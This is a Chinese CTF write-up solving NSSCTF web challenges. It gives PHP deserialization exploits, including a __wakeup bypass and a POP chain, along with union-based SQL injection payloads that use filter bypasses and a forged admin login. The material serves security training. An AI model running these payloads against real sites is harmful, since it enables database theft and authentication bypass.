NSSCTF中24网安培训day2中web题目

  • 开发
  • 17

[SWPUCTF 2021 新生赛]ez_unserialize

这道题目考察php反序列化的知识点

打开题目,发现没有提示,我们试着用御剑扫描目录文件,发现存在robots.txt的文件

接着访问这个文件,发现是一段php反序列化代码,我们需要进行序列化的转换

简单的构造exp代码如下,在末尾那里


<?php
  error_reporting(0);
show_source("cl45s.php");

class wllm{

  public $admin;
  public $passwd;

  public function __construct(){
    $this->admin ="user";
    $this->passwd = "123456";
  }

  public function __destruct(){
    if($this->admin === "admin" && $this->passwd === "ctf"){
      include("flag.php");
      echo $flag;
    }else{
      echo $this->admin;
      echo $this->passwd;
      echo "Just a bit more!";
    }
  }
}
$a=new wllm();
$a->admin = "admin";
$a->passwd = "ctf";
$s=serialize($a);
echo $s;
?>

运行即可得到

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

我们再进行paylaod,即可得到flag

?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

[SWPUCTF 2021 新生赛]no_wakeup

这道题目考察php反序列化的知识点以及__wakeup函数的绕过

按照提示点击即可获得下面php代码,同样也是要将代码进行序列化转换,但是这道题目出现了__wakeup函数,我们需要进行绕过

我们只需要像上面题目构造exp即可,在末尾那里

<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

// $Letmeseesee = $_GET['p'];
// unserialize($Letmeseesee);
$a = new HaHaHa();
$a->admin = admin;
$a->passwd = wllm;
echo serialize($a)

?>

构造完运行可以得到如下

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";} 

但是呢,我们如果直接对此进行payload是不可以的,因为还存在着wakeup函数,绕过它非常简单,我们只需要将属性的个数值修改即可,2--->>>3/4/5等等

构造payload如下

?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

[SWPUCTF 2021 新生赛]pop 

这道题目依旧考察php反序列化的知识点,但这道题目中出现了toString的魔术引号,我们需要知道它的用法

也就是说我们要了解清楚代码的运行顺序 ,创建输出对象后就会自动调用toString方法

首先观察一下整段代码,再结合上面总结的魔术方法分析一下,w44m类里面的Getflag函数可以用来读取flag,因此就将它作为这条链子的尾部。

再想一下如何去调用这个函数,看下面这段代码。这段代码中,$this->w00m->{$this->w22m}();会调用函数,所以只需要给$w00m赋一个w44m类,然后再给w22m赋一个Getflag就能成功调用该函数。 

再考虑一下如何调用这个w33m类呢??上面写过__toString()这个方法会在一个对象被当作字符串时被调用,于是我们就能看到下面w22m这个类里面的echo函数。我们只要给w00m赋一个w33m类,就能调用。

到了这里,析构函数__destruct,会在对象被销毁时调用,所以我们已经摸到这条链子的头了,捋一下这条链子。 

 w22m::__destruct()->w33m::__toString()->w44m::Getflag()

然后我们构造一下exp代码
这里注意,因为admin和passwd是私有类和被保护的类,所以没办法在该类的外部赋值或引用,所以要在类中提前赋值 

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'w44m';
    protected $passwd = '08067';

}

class w22m{
    public $w00m;
   
}

class w33m{
    public $w00m;
    public $w22m;
   
}

// $w00m = $_GET['w00m'];
// unserialize($w00m);
$a=new w22m;
$a->w00m=new w33m;
$a->w00m->w00m=new w44m;
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));

?>

运行成功之后可以得到exp

O%3A4%3A"w22m"%3A1%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w33m"%3A2%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w44m"%3A2%3A%7Bs%3A11%3A"%00w44m%00admin"%3Bs%3A4%3A"w44m"%3Bs%3A9%3A"%00%2A%00passwd"%3Bs%3A5%3A"08067"%3B%7Ds%3A4%3A"w22m"%3Bs%3A7%3A"Getflag"%3B%7D%7D 

接着构造payload如下:

?w00m=O%3A4%3A"w22m"%3A1%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w33m"%3A2%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w44m"%3A2%3A%7Bs%3A11%3A"%00w44m%00admin"%3Bs%3A4%3A"w44m"%3Bs%3A9%3A"%00%2A%00passwd"%3Bs%3A5%3A"08067"%3B%7Ds%3A4%3A"w22m"%3Bs%3A7%3A"Getflag"%3B%7D%7D 

[SWPUCTF 2021 新生赛]easy_sql 

这道题目考察sql注入中的联合注入

首先题目地址给出提示参数是wllm,尝试用数字型注入,发现没有正常回显,用单引号注入提示报错语句,从这里可以得知这道题目是字符型的单引号注入,接着用order by判断字段数

?wllm=1' order by 3--+      //当数字为4时,出现报错,可以得知为3个字段数

?wllm=-1' union select 1,2,3--+   //判断回显点,题目出现2和3的提示,说明从2和3中出现回显点

?wllm=-1' union select 1,2,database()--+       //爆出数据库为test_db

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+           //爆出表名test_tb和users

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='users'--+      //从users表中爆出字段名id,username,password,没有获得我们想要的flag,换张表试试

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'--+    //从test_tb表中获取到flag字段

?wllm=-1' union select 1,2,group_concat(flag) from test_tb--+    //获取flag字段内容

[SWPUCTF 2021 新生赛]sql 

这道题目考察的知识点是sql注入的绕过,空格绕过/**/,注释符绕过%23,等于号=的绕过like,and的绕过,截取函数substr的绕过mid

首先尝试数字型注入,发现没有出现报错界面,试试字符单引号型,发现出现报错语句,此时我们的注释符要替换成url编码形式绕过,以及空格的绕过

?wllm=1'/**/order/**/by/**/3%23               //当数字出现4时报错,说明字段数为3

?wllm=-1'union/**/select/**/1,2,3%23      //题目出现2和3的提示,说明在2和3中出现回显点

?wllm=-1'union/**/select/**/1,2,group_concat(database())%23     //爆出库名test_db

?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like("test_db")%23     //出现表名LTLT_flag和users,猜测flag在LTLT_flag表中

?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23

//爆出字段名id和flag,这里绕过了and,因此只从表中获取到字段名

?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23   //这里只能获取到flag的一部分NSSCTF{6bef6596-477a,此时需要用到截取函数截取后面的部分

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/LTLT_flag%23

//可以得到NSSCTF{6bef6596-477a

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/LTLT_flag%23

//可以得到-4360-a43c-252e2f15c

?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/LTLT_flag%23

//可以得到70e}

拼接起来可以得到flagNSSCTF{6bef6596-477a-4360-a43c-252e2f15c70e}

[GXYCTF 2019]BabySqli 

这道题目考察POST方式的注入,并且带有过滤,我们同样需要进行绕过

先随便输入用户名和密码,配合Burpsuite抓包可以得到如下:得知为POST注入

1.判断注入点:在name上假设为注入点,尝试用数字型,没有显示报错语句,再试试字符单引号型出现报错语句,得知为字符型单引号的注入

 2.判断注入点:我们通过抓包可以得到

容易得知上面字符为base32加密,我们先进行解密,再得到base64加密字符,再用base64解密可以得到

select * from user where username = '$name' 

可以得知注入点为name,并且为单引号型注入 

POST型注入内容:

name=1' group by 3--+&pw=1            //这里可以得到数字4出现报错,得知有3个字段,并且在这里需要绕过order,用group即可绕过

这里用到弱口令猜测的方法 :猜测username为admin,而密码未知,在表中正常存在id,username,passwd这三个字段,但是我们不知道它们正确的顺序,并且passwd是经过md5加密的

接着我们判断admin在表中的哪个位置

name=-1' union select 'admin',2,3--+&pw=1      //假设在第一个字段,出现wrong user!

name=-1' union select 1,'admin',3--+&pw=1      //假设在第二个字段,出现wrong pass!

name=-1' union select 1,2,'admin'--+&pw=1      //假设在第三个字段,出现wrong user!

可以得知admin在第二个字段,第三个字段就为password

接着我们假设password为123,我们需要让123经过md5加密,再进行注入,如下

name=-1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123

这里我们注入完成之后,数据库如下 

 

这道题目需要了解数据库的字段格式,相对于我来说,这道题目也是新的解题方式

 

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-16 18:26:01       67 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-16 18:26:01       72 阅读

  9. 在Django里面运行非项目文件

    2024-07-16 18:26:01       58 阅读

  19. Python语言-面向对象

    2024-07-16 18:26:01       69 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-16 18:26:01       64 阅读

热门阅读

  3. 使用SpringBoot集成Minio实现文件上传、下载、删除功能

    2024-07-16 18:26:01       23 阅读
  4. unseping

    unseping

    2024-07-16 18:26:01      21 阅读

  8. 【C语言高级指导】错误处理

    2024-07-16 18:26:01       21 阅读

  9. Unity七大原则

    2024-07-16 18:26:01       18 阅读

  14. C++ 入门14:STL 容器之向量(vector)

    2024-07-16 18:26:01       24 阅读

  18. GO—CPU占用高问题归类

    2024-07-16 18:26:01       20 阅读

  19. git流程及命令

    2024-07-16 18:26:01       16 阅读

  20. vue3上传图片,进行图片压缩(image-compressor.js)

    2024-07-16 18:26:01       22 阅读

  23. 图片裁剪-cropperjs

    2024-07-16 18:26:01       22 阅读

  24. 聊聊自动驾驶中的路径和轨迹

    2024-07-16 18:26:01       22 阅读

  27. python利用ffmpeg实现视频流的下载,并分段保存

    2024-07-16 18:26:01       24 阅读

  28. virsh命令使用笔记

    2024-07-16 18:26:01       23 阅读

  30. 变分法笔记3:多变量函数

    2024-07-16 18:26:01       17 阅读